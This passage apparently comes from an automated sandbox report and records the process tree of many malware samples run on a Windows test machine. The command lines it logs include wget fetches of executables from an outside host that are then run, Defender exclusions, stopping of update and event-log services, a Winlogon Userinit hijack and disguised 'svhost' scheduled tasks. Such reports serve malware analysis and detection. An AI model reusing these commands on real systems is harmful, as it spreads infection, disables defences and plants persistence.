      System Location Discovery: System Language Discovery
      PID:1876
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3836
- - C:\Users\Admin\Desktop\Files\boot.exe
    "C:\Users\Admin\Desktop\Files\boot.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:3700
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CA48.tmp\CA49.tmp\CA4A.bat C:\Users\Admin\Desktop\Files\boot.exe"
      4⤵
      PID:5688
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        Modifies registry class
        
        PID:3724
    - - C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget "http://quanlyphongnet.com/net/Google Chrome.exe" -O "Google Chrome.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5476
    - - C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget "http://quanlyphongnet.com/net/Coc Coc.exe" -O "Coc Coc.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6128
    - - C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget "http://quanlyphongnet.com/net/run.exe" -O "run.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6016
    - - C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget "http://quanlyphongnet.com/net/run2.exe" -O "run2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4532
    - - C:\Users\Admin\AppData\Roaming\run.exe
        
        run.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:6632
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\13C4.tmp\13C5.tmp\13C6.bat C:\Users\Admin\AppData\Roaming\run.exe"
        6⤵
        
        PID:6732
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrator:(OI)(CI)F /t /c
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6676
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrators:(OI)(CI)F /t /c
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:7052
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:2652
        
        C:\Windows\system32\attrib.exe
        
        attrib -h "C:\Users\Administrator\Desktop\Google Chrome.exe"
        7⤵
        Views/modifies file attributes
        
        PID:7136
        
        C:\Windows\system32\attrib.exe
        
        attrib -h "C:\Users\Administrator\Desktop\Coc Coc.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4116
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4460
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "\Microsoft\Windows\Task Manager\Interactive" /F
        7⤵
        
        PID:4732
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "\Microsoft\Windows\USB\Usb-Notifications" /F
        7⤵
        
        PID:4264
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "\Microsoft\Windows\Feedback\Siuf\DmClient" /F
        7⤵
        
        PID:1996
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "Fix Getting Devices" /F
        7⤵
        
        PID:6232
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "Windows Optimize" /F
        7⤵
        
        PID:6176
        
        C:\Windows\system32\schtasks.exe
        
        SchTasks /Delete /TN "ChangeWallpaper" /F
        7⤵
        
        PID:6276
    - - C:\Users\Admin\AppData\Roaming\run2.exe
        
        run2.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:7076
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1626.tmp\1627.tmp\1628.bat C:\Users\Admin\AppData\Roaming\run2.exe"
        6⤵
        Drops file in System32 directory
        
        PID:6352
        
        C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget -q "http://quanlyphongnet.com/net/wallx.exe" -O "wallx.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1164
        
        C:\Users\Admin\AppData\Roaming\wallx.exe
        
        wallx.exe
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6644
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\20B5.tmp\20B6.tmp\20B7.bat C:\Users\Admin\AppData\Roaming\wallx.exe"
        8⤵
        
        PID:3904
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:7136
        
        C:\Users\Admin\AppData\Roaming\WallpaperX.exe
        
        WallpaperX.exe
        9⤵
        Executes dropped EXE
        Sets desktop wallpaper using registry
        
        PID:1460
        
        C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget -q "http://quanlyphongnet.com/net/boot.exe" -O "boot.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:6744
        
        C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget -q "http://quanlyphongnet.com/net/FixCSM.exe" -O "FixCSM.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4912
        
        C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget -q "http://quanlyphongnet.com/net/del.exe" -O "C:\Windows\System32\del.exe"
        7⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:1856
        
        C:\Users\Admin\AppData\Roaming\wget.exe
        
        wget -q "http://quanlyphongnet.com/net/Coc Coc XG.exe" -O "Coc Coc XG.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:7136
        
        C:\Windows\system32\takeown.exe
        
        takeown /F "C:\windows\system32\userinit.exe"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4732
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\windows\system32\userinit.exe" /grant administrators:F
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3376
        
        C:\FixCSM.exe
        
        C:\FixCSM.exe
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5404
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6E39.tmp\6E3A.tmp\6E3B.bat C:\FixCSM.exe"
        8⤵
        
        PID:6232
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\System32\boot.exe,C:\Program Files (x86)\CSMClient\CyberStation.exe," /f
        9⤵
        Modifies WinLogon for persistence
        
        PID:2056
        
        C:\Windows\system32\timeout.exe
        
        TIMEOUT /T 10
        7⤵
        Delays execution with timeout.exe
        
        PID:5916
        
        C:\Windows\System32\del.exe
        
        C:\Windows\System32\del.exe
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3376
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9420.tmp\9421.tmp\9422.bat C:\Windows\System32\del.exe"
        8⤵
        
        PID:5384
        
        C:\Windows\system32\timeout.exe
        
        TIMEOUT /T 5
        9⤵
        Delays execution with timeout.exe
        
        PID:6348
        
        C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Administrator\AppData\Roaming\config.txt"
        7⤵
        Views/modifies file attributes
        
        PID:6804
        
        C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Administrator\AppData\Roaming\log.txt"
        7⤵
        Views/modifies file attributes
        
        PID:552
- - C:\Users\Admin\Desktop\Files\test9.exe
    "C:\Users\Admin\Desktop\Files\test9.exe"
    3⤵
    - Executes dropped EXE
    PID:3436
- - C:\Users\Admin\Desktop\Files\discord.exe
    "C:\Users\Admin\Desktop\Files\discord.exe"
    3⤵
    - Executes dropped EXE
    PID:5628
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6328
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:6544
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6920
- - C:\Users\Admin\Desktop\Files\AUTOKEY.exe
    "C:\Users\Admin\Desktop\Files\AUTOKEY.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6184
- - C:\Users\Admin\Desktop\Files\chrome_93.exe
    "C:\Users\Admin\Desktop\Files\chrome_93.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Drops file in Drivers directory
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:3028
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:752
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5048
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:7136
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:6604
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:6852
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:6448
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:4648
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:6344
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:6284
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:1580
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:6608
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
      4⤵
      Launches sc.exe
      PID:1052
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:4328
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:6336
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
      4⤵
      Launches sc.exe
      PID:2784
- - C:\Users\Admin\Desktop\Files\ApertureLab.exe
    "C:\Users\Admin\Desktop\Files\ApertureLab.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6168
  - - C:\Users\Admin\AppData\Roaming\updtewinsup221\client32.exe
      "C:\Users\Admin\AppData\Roaming\updtewinsup221\client32.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:1228
- - C:\Users\Admin\Desktop\Files\random.exe
    "C:\Users\Admin\Desktop\Files\random.exe"
    3⤵
    - Enumerates VirtualBox registry keys
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    PID:5984
- - C:\Users\Admin\Desktop\Files\newtpp.exe
    "C:\Users\Admin\Desktop\Files\newtpp.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:6828
  - - C:\Windows\sysnldcvmr.exe
      C:\Windows\sysnldcvmr.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:3744
    - - C:\Users\Admin\AppData\Local\Temp\1223422352.exe
        
        C:\Users\Admin\AppData\Local\Temp\1223422352.exe
        5⤵
        Checks computer location settings
        
        PID:6768
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:7008
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:6396
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:5716
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:752
    - - C:\Users\Admin\AppData\Local\Temp\1828110144.exe
        
        C:\Users\Admin\AppData\Local\Temp\1828110144.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3232
      - C:\Users\Admin\AppData\Local\Temp\2389532921.exe
        
        C:\Users\Admin\AppData\Local\Temp\2389532921.exe
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        
        PID:6504
    - - C:\Users\Admin\AppData\Local\Temp\230830707.exe
        
        C:\Users\Admin\AppData\Local\Temp\230830707.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6400
    - - C:\Users\Admin\AppData\Local\Temp\2723718555.exe
        
        C:\Users\Admin\AppData\Local\Temp\2723718555.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6552
    - - C:\Users\Admin\AppData\Local\Temp\249826912.exe
        
        C:\Users\Admin\AppData\Local\Temp\249826912.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5704
      - C:\Users\Admin\AppData\Local\Temp\2848533004.exe
        
        C:\Users\Admin\AppData\Local\Temp\2848533004.exe
        6⤵
        
        PID:6584
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6584 -s 13864
        7⤵
        Program crash
        
        PID:6744
- - C:\Users\Admin\Desktop\Files\payload.exe
    "C:\Users\Admin\Desktop\Files\payload.exe"
    3⤵
    PID:8652
- - C:\Users\Admin\Desktop\Files\856.exe
    "C:\Users\Admin\Desktop\Files\856.exe"
    3⤵
    PID:8776
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall delete allowedprogram "C:\Users\Admin\Desktop\Files\856.exe"
      4⤵
      Modifies Windows Firewall
      PID:6260
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:4584
  - - C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
      4⤵
      PID:5372
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5372 -s 244
        5⤵
        Program crash
        
        PID:7060
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    3⤵
    PID:6444
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x144,0x148,0x14c,0x120,0x150,0x7ffa70bc46f8,0x7ffa70bc4708,0x7ffa70bc4718
      4⤵
      PID:1456
- - C:\Users\Admin\Desktop\Files\crypted.exe
    "C:\Users\Admin\Desktop\Files\crypted.exe"
    3⤵
    PID:5352
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:7676
- - C:\Users\Admin\Desktop\Files\svhost.exe
    "C:\Users\Admin\Desktop\Files\svhost.exe"
    3⤵
    PID:7800
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\svhost.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:9084
  - - C:\Users\Admin\AppData\Roaming\svhost\svhost.exe
      "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe"
      4⤵
      PID:1828
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7928
- - C:\Users\Admin\Desktop\Files\zzzz1.exe
    "C:\Users\Admin\Desktop\Files\zzzz1.exe"
    3⤵
    PID:5496
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      PID:7224
- - C:\Users\Admin\Desktop\Files\Team.exe
    "C:\Users\Admin\Desktop\Files\Team.exe"
    3⤵
    PID:8804
- - C:\Users\Admin\Desktop\Files\XClient.exe
    "C:\Users\Admin\Desktop\Files\XClient.exe"
    3⤵
    PID:4084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6396
- - C:\Users\Admin\Desktop\Files\svhoste.exe
    "C:\Users\Admin\Desktop\Files\svhoste.exe"
    3⤵
    PID:740
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "svhoste" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\svhoste.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2104
- - C:\Users\Admin\Desktop\Files\app64.exe
    "C:\Users\Admin\Desktop\Files\app64.exe"
    3⤵
    PID:5624
- - C:\Users\Admin\Desktop\Files\exbuild.exe
    "C:\Users\Admin\Desktop\Files\exbuild.exe"
    3⤵
    PID:1048
  - - C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
      "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
      4⤵
      PID:6512
- - C:\Users\Admin\Desktop\Files\dccrypt.exe
    "C:\Users\Admin\Desktop\Files\dccrypt.exe"
    3⤵
    PID:4940
- - C:\Users\Admin\Desktop\Files\gvndxfghs.exe
    "C:\Users\Admin\Desktop\Files\gvndxfghs.exe"
    3⤵
    PID:3424
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1000
      4⤵
      Program crash
      PID:7976
- - C:\Users\Admin\Desktop\Files\file.exe
    "C:\Users\Admin\Desktop\Files\file.exe"
    3⤵
    PID:7652
- - C:\Users\Admin\Desktop\Files\xyaw4fkp.exe
    "C:\Users\Admin\Desktop\Files\xyaw4fkp.exe"
    3⤵
    PID:8128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/gui/file/7c8a5e6cf4e451d61157e113f431a1f3e606fba0e7147ffa9a8f429cb60e47d6/detection
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  PID:5856
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffa70bc46f8,0x7ffa70bc4708,0x7ffa70bc4718
    3⤵
    PID:8
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:2
    3⤵
    PID:5740
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
    3⤵
    PID:5636
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
    3⤵
    PID:3116
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
    3⤵
    PID:5984
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
    3⤵
    PID:4996
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4236 /prefetch:1
    3⤵
    PID:1860
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:1
    3⤵
    PID:5348
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5592 /prefetch:8
    3⤵
    PID:1996
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5592 /prefetch:8
    3⤵
    PID:5696
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
    3⤵
    PID:2056
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
    3⤵
    PID:5252
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
    3⤵
    PID:1032
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1
    3⤵
    PID:3308
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,12120114319926053097,11452239920177714204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1784 /prefetch:1
    3⤵
    PID:6412
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
